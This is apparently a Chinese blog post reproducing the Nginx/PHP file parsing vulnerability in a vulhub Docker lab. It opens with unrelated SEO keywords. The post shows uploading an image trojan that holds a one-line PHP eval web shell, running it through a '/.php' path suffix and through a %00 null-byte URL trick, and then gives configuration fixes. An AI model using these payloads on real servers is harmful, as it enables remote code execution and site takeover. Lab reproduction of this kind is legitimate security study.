郑州手机网站,网站制作过程流程,wordpress主题 演示数据,网站新开怎么做营销一、漏洞说明 Nginx文件解析漏洞算是一个比较经典的漏洞#xff0c;接下来我们就通过如下步骤进行漏洞复现#xff0c;以及进行漏洞的修复。 版本条件#xff1a;IIS 7.0/IIS 7.5/ Nginx 8.03 二、搭建环境 cd /vulhub/nginx/nginx_parsing_vulnerability docker-compos…一、漏洞说明 Nginx文件解析漏洞算是一个比较经典的漏洞接下来我们就通过如下步骤进行漏洞复现以及进行漏洞的修复。 版本条件IIS 7.0/IIS 7.5/ Nginx 8.03 二、搭建环境 cd /vulhub/nginx/nginx_parsing_vulnerability docker-compose up -d
三、漏洞特征 访问http://192.168.25.128/uploadfiles/nginx.png
然后我们输入/.php可以发现并没有出现文件为找到而是出现了php的配置信息
四、漏洞复现 使用界面的上传功能上传一个jpg图片马jpg内容是eval($_POST[“fname”]);
点击上传后
然后访问 http://192.168.25.128/uploadfiles/b82ae21729b331095eb02a213284320d.jpg/.php
五、修复建议 1.php.ini配置文件中的cgi.fix_pathinfo1设置为0 2.security.limit_extensions./php 六、Nginx 8.03 空字节代码执行漏洞 影响版本:0.5.,0.6., 0.7 0.7.65, 0.8 0.8.37 当使用PHP-FastCGI执行PHP时遇到url里面存在%00空字节时与FastCGI的处理不一致导致可在非PHP文件中嵌入PHP代码通过访问url%00.PHP来执行其中的PHP代码。 例如http://127.0.0.1/1.jpg%00.php会把1.jpg文件木马文件当做PHP文件来执行。xxx.jpg%00.php